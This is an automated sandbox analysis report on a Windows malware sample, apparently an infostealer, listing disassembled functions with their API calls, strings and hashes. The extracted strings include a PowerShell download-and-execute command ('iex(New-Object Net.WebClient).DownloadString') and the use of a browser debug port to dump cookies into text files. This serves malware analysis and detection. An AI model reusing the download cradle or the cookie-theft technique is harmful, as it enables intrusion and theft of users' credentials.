                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen
                                • String ID: f
                                • API String ID: 2762123234-1993550816
                                • Opcode ID: 737ed1dee8cb70a684bcd24652b427280c03084737728c1510d0dd40fd27a9ed
                                • Instruction ID: b0b9062e27c3eac53a323f13f847bc062de63cea4441ad2e315bbb4786678c29
                                • Opcode Fuzzy Hash: 737ed1dee8cb70a684bcd24652b427280c03084737728c1510d0dd40fd27a9ed
                                • Instruction Fuzzy Hash: 46B17CB0A116279BCB22FBA9DC48AEFB7B7BF41300F040529E81597661EB34DD41CB95
                                Function 006C47E0 Relevance: 38.5, APIs: 11, Strings: 11, Instructions: 48libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNEL32(ws2_32.dll,?,006B72A4), ref: 006C47E6
                                • GetProcAddress.KERNEL32(00000000,connect), ref: 006C47FC
                                • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 006C480D
                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 006C481E
                                • GetProcAddress.KERNEL32(00000000,htons), ref: 006C482F
                                • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 006C4840
                                • GetProcAddress.KERNEL32(00000000,recv), ref: 006C4851
                                • GetProcAddress.KERNEL32(00000000,socket), ref: 006C4862
                                • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 006C4873
                                • GetProcAddress.KERNEL32(00000000,closesocket), ref: 006C4884
                                • GetProcAddress.KERNEL32(00000000,send), ref: 006C4895
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                                • API String ID: 2238633743-3087812094
                                • Opcode ID: 9829800eca607cf3831e2858afb8b1a3bee7827cfcd5fc7f4e5b2646ef043f61
                                • Instruction ID: 9e41376a9c04b458cc72835faac27f65510123e4ec45e7e67291944c692fd3e6
                                • Opcode Fuzzy Hash: 9829800eca607cf3831e2858afb8b1a3bee7827cfcd5fc7f4e5b2646ef043f61
                                • Instruction Fuzzy Hash: FC114771D53B21FBC711AFB5BC0DA563BB9BA097063054B1BF592E6660EAF44800DF60
                                Function 006BBE20 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 203stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006BBE53
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006BBE86
                                • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 006BBE91
                                • lstrcpy.KERNEL32(00000000,?), ref: 006BBEB1
                                • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 006BBEBD
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006BBEE0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006BBEEB
                                • lstrlen.KERNEL32(')"), ref: 006BBEF6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006BBF13
                                • lstrcat.KERNEL32(00000000,')"), ref: 006BBF1F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006BBF46
                                • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 006BBF66
                                • lstrcpy.KERNEL32(00000000,?), ref: 006BBF88
                                • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 006BBF94
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006BBFBA
                                • ShellExecuteEx.SHELL32(?), ref: 006BC00C
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                                • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                • API String ID: 4016326548-898575020
                                • Opcode ID: 02bd3573dcc161ed11f8f4ebc1c9b1e791f1c6a0c93ac7adc2adff29134ee86f
                                • Instruction ID: 6d0c9efc1f96d96345b4a96042a74338322aace9766d47cac309d4e6911dabb5
                                • Opcode Fuzzy Hash: 02bd3573dcc161ed11f8f4ebc1c9b1e791f1c6a0c93ac7adc2adff29134ee86f
                                • Instruction Fuzzy Hash: 8F6190B0A11216ABCB21BFB99C596EE7BAABF05300F04146DF509D3221DB74CD428F94
                                Function 006C1820 Relevance: 31.5, APIs: 25, Instructions: 269stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006C184F
                                • lstrlen.KERNEL32(01326C00), ref: 006C1860
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C1887
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006C1892
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C18C1
                                • lstrlen.KERNEL32(006D4FA0), ref: 006C18D3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C18F4
                                • lstrcat.KERNEL32(00000000,006D4FA0), ref: 006C1900
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C192F
                                • lstrlen.KERNEL32(01326C20), ref: 006C1945
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C196C
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006C1977
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C19A6
                                • lstrlen.KERNEL32(006D4FA0), ref: 006C19B8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C19D9
                                • lstrcat.KERNEL32(00000000,006D4FA0), ref: 006C19E5
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C1A14
                                • lstrlen.KERNEL32(01326C40), ref: 006C1A2A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C1A51
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006C1A5C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C1A8B
                                • lstrlen.KERNEL32(01326C60), ref: 006C1AA1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C1AC8
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006C1AD3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C1B02
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcatlstrlen
                                • String ID:
                                • API String ID: 1049500425-0
                                • Opcode ID: a8cb3378941f606b2b024126f619f9925b0e90dd6171c98a6d962a8a2723e4f8
                                • Instruction ID: 7e43afe11de090aa492da76c944203e0f852403214343dd09d629d8bda4678c8
                                • Opcode Fuzzy Hash: a8cb3378941f606b2b024126f619f9925b0e90dd6171c98a6d962a8a2723e4f8
                                • Instruction Fuzzy Hash: ED911FB16017039BDB20AFBADC98E6AB7EAFF06300B14452DE986C7752DB34DC418B50
                                Function 006B4760 Relevance: 30.3, APIs: 18, Strings: 2, Instructions: 309stringmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B4793
                                • LocalAlloc.KERNEL32(00000040,?), ref: 006B47C5
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006B4812
                                • lstrlen.KERNEL32(006D4B60), ref: 006B481D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B483A
                                • lstrcat.KERNEL32(00000000,006D4B60), ref: 006B4846
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B486B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B4898
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006B48A3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B48CA
                                • StrStrA.SHLWAPI(?,00000000), ref: 006B48DC
                                • lstrlen.KERNEL32(?), ref: 006B48F0
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006B4931
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B49B8
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B49E1
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B4A0A
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B4A30
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B4A5D
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                                • String ID: ^userContextId=4294967295$moz-extension+++
                                • API String ID: 4107348322-3310892237
                                • Opcode ID: 31c8318e3719c932750f03349efd8751c202d4fbaefb2b0ed4fd3ecac07af31c
                                • Instruction ID: 7bc3da2b1fc1a8fa57d2466bbebb973caa9382900dadb716ea7a909174032669
                                • Opcode Fuzzy Hash: 31c8318e3719c932750f03349efd8751c202d4fbaefb2b0ed4fd3ecac07af31c
                                • Instruction Fuzzy Hash: 10B19DB1A512169BCB21FF69D895AEE77BBAF41700F04412CF94AA7712DF30EC418B94
                                Function 006A92B0 Relevance: 27.4, APIs: 13, Strings: 5, Instructions: 369stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 006A90C0: InternetOpenA.WININET(006CCFEC,00000001,00000000,00000000,00000000), ref: 006A90DF
                                  • Part of subcall function 006A90C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 006A90FC
                                  • Part of subcall function 006A90C0: InternetCloseHandle.WININET(00000000), ref: 006A9109
                                • strlen.MSVCRT ref: 006A92E1
                                • strlen.MSVCRT ref: 006A92FA
                                  • Part of subcall function 006A8980: std::_Xinvalid_argument.LIBCPMT ref: 006A8996
                                • strlen.MSVCRT ref: 006A9399
                                • strlen.MSVCRT ref: 006A93E6
                                • lstrcat.KERNEL32(?,cookies), ref: 006A9547
                                • lstrcat.KERNEL32(?,006D1794), ref: 006A9559
                                • lstrcat.KERNEL32(?,?), ref: 006A956A
                                • lstrcat.KERNEL32(?,006D4B98), ref: 006A957C
                                • lstrcat.KERNEL32(?,?), ref: 006A958D
                                • lstrcat.KERNEL32(?,.txt), ref: 006A959F
                                • lstrlen.KERNEL32(?), ref: 006A95B6
                                • lstrlen.KERNEL32(?), ref: 006A95DB
                                • lstrcpy.KERNEL32(00000000,?), ref: 006A9614
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                                • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                • API String ID: 1201316467-3542011879
                                • Opcode ID: 14c16a32bf185637c8feeea258b2cc49dac3d830bd365dd1a0c45c00140b87f4
                                • Instruction ID: b966bfa9cac316f62b92dfe36b38b560428e7a35207faeb5d3898572cf1aba0b
                                • Opcode Fuzzy Hash: 14c16a32bf185637c8feeea258b2cc49dac3d830bd365dd1a0c45c00140b87f4
                                • Instruction Fuzzy Hash: DBE12A71E10219DBDF50EFA8D891ADDBBB6BF49300F2044AAE509A7251EB309E45CF94
                                Function 006BD980 Relevance: 27.3, APIs: 18, Instructions: 292stringCOMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 006BD9A1
                                • memset.MSVCRT ref: 006BD9B3
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 006BD9DB
                                • lstrcpy.KERNEL32(00000000,?), ref: 006BDA0E
                                • lstrcat.KERNEL32(?,00000000), ref: 006BDA1C
                                • lstrcat.KERNEL32(?,0133ED88), ref: 006BDA36
                                • lstrcat.KERNEL32(?,?), ref: 006BDA4A
                                • lstrcat.KERNEL32(?,0133D708), ref: 006BDA5E
                                • lstrcpy.KERNEL32(00000000,?), ref: 006BDA8E
                                • GetFileAttributesA.KERNEL32(00000000), ref: 006BDA95
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006BDAFE
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                                • String ID:
                                • API String ID: 2367105040-0
                                • Opcode ID: 477593acb4b76ffebbbf8f3c70e34377ca2f88f8364a8be9fac5d73c4aca8cb4
                                • Instruction ID: 5efe0b214a2a256acacf7a0cf5d007ea30a725842c4bfc097640c5270bb02ce1
                                • Opcode Fuzzy Hash: 477593acb4b76ffebbbf8f3c70e34377ca2f88f8364a8be9fac5d73c4aca8cb4
                                • Instruction Fuzzy Hash: 59B19FB1910259AFDB10FF64DC949EEB7BAFF48300F144569E94AA7250EB309E85CF90
                                Function 006AB309 Relevance: 25.5, APIs: 20, Instructions: 451stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006AB330
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006AB37E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006AB3A9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006AB3B1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006AB3D9
                                • lstrlen.KERNEL32(006D4C50), ref: 006AB450
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006AB474
                                • lstrcat.KERNEL32(00000000,006D4C50), ref: 006AB480
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006AB4A9
                                • lstrlen.KERNEL32(00000000), ref: 006AB52D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006AB557
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006AB55F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006AB587
                                • lstrlen.KERNEL32(006D4AD4), ref: 006AB5FE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006AB622
                                • lstrcat.KERNEL32(00000000,006D4AD4), ref: 006AB62E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006AB65E
                                • lstrlen.KERNEL32(?), ref: 006AB767
                                • lstrlen.KERNEL32(?), ref: 006AB776
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006AB79E
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat
                                • String ID:
                                • API String ID: 2500673778-0
                                • Opcode ID: 099da6d0cd8152ec434837429e7ae8bf8eeace29d1f17925df89130a062ac053
                                • Instruction ID: 3e1e26f1a2e4be2714bfc0fbf55ed01a088858516cf49c9ef4d590dbfe0a2e6e
                                • Opcode Fuzzy Hash: 099da6d0cd8152ec434837429e7ae8bf8eeace29d1f17925df89130a062ac053
                                • Instruction Fuzzy Hash: 87024170A01216CFCB25EF69D958AAAB7F2BF46304F18916DE4099B362D775DC42CF80
                                Function 006C3760 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 222registrystringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 006C71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 006C71FE
                                • RegOpenKeyExA.ADVAPI32(?,01338B28,00000000,00020019,?), ref: 006C37BD
                                • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 006C37F7
                                • wsprintfA.USER32 ref: 006C3822
                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 006C3840
                                • RegCloseKey.ADVAPI32(?), ref: 006C384E
                                • RegCloseKey.ADVAPI32(?), ref: 006C3858
                                • RegQueryValueExA.ADVAPI32(?,0133E890,00000000,000F003F,?,?), ref: 006C38A1
                                • lstrlen.KERNEL32(?), ref: 006C38B6
                                • RegQueryValueExA.ADVAPI32(?,0133EA28,00000000,000F003F,?,00000400), ref: 006C3927
                                • RegCloseKey.ADVAPI32(?), ref: 006C3972
                                • RegCloseKey.ADVAPI32(?), ref: 006C3989
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
